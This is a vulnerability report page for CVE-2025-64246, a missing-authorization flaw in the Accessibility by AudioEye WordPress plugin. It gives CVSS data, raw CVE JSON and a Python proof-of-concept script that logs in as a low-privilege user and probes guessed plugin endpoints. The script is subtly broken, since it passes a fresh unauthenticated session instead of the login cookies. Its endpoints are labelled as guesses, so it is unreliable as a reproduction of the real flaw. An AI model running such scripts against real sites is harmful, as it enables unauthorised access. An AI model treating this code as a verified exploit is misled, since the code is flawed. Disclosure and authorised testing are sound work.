Security Vulnerability Report
中文
CVE-2025-64246 CVSS 4.3 MEDIUM

CVE-2025-64246

Published: 2025-12-16 09:15:54
Last Modified: 2026-04-27 16:16:37

Description

Missing Authorization vulnerability in netopsae Accessibility by AudioEye accessibility-by-audioeye allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accessibility by AudioEye: from n/a through <= 1.0.49.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Accessibility by AudioEye <= 1.0.49

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64246 PoC - AudioEye WordPress Plugin Broken Access Control # Target: Accessibility by AudioEye Plugin <= 1.0.49 import requests import sys TARGET_URL = "http://target-wordpress-site.com" USERNAME = "low_privilege_user" PASSWORD = "user_password" def get_auth_cookie(): """Login to WordPress and get authentication cookies""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' in str(session.cookies): print("[+] Successfully authenticated as low-privilege user") return session.cookies else: print("[-] Authentication failed") return None def exploit_broken_access(session): """Exploit the missing authorization vulnerability""" # Common AudioEye AJAX endpoints that may lack authorization endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/audioeye/v1/', '/wp-json/audioeye/v1/settings', '/wp-admin/admin.php?page=audioeye-settings' ] for endpoint in endpoints: url = TARGET_URL + endpoint print(f"[*] Testing endpoint: {endpoint}") try: # Test with low-privilege authenticated session response = session.get(url, timeout=10) if response.status_code == 200: print(f"[!] VULNERABLE: {endpoint} - Accessible with low privileges") print(f"[*] Response preview: {response.text[:200]}...") # Check for sensitive data exposure if 'admin' in response.text.lower() or 'settings' in response.text.lower(): print("[!] Sensitive data may be exposed") elif response.status_code == 403: print(f"[+] Protected: {endpoint} - Access denied (expected)") else: print(f"[*] Status: {response.status_code}") except requests.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-64246 PoC - AudioEye Broken Access Control") print("=" * 60) cookies = get_auth_cookie() if cookies: exploit_broken_access(requests.Session()) else: sys.exit(1)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64246", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:54.290", "lastModified": "2026-04-27T16:16:37.317", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in netopsae Accessibility by AudioEye accessibility-by-audioeye allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accessibility by AudioEye: from n/a through <= 1.0.49."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/accessibility-by-audioeye/vulnerability/wordpress-accessibility-by-audioeye-plugin-1-0-49-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}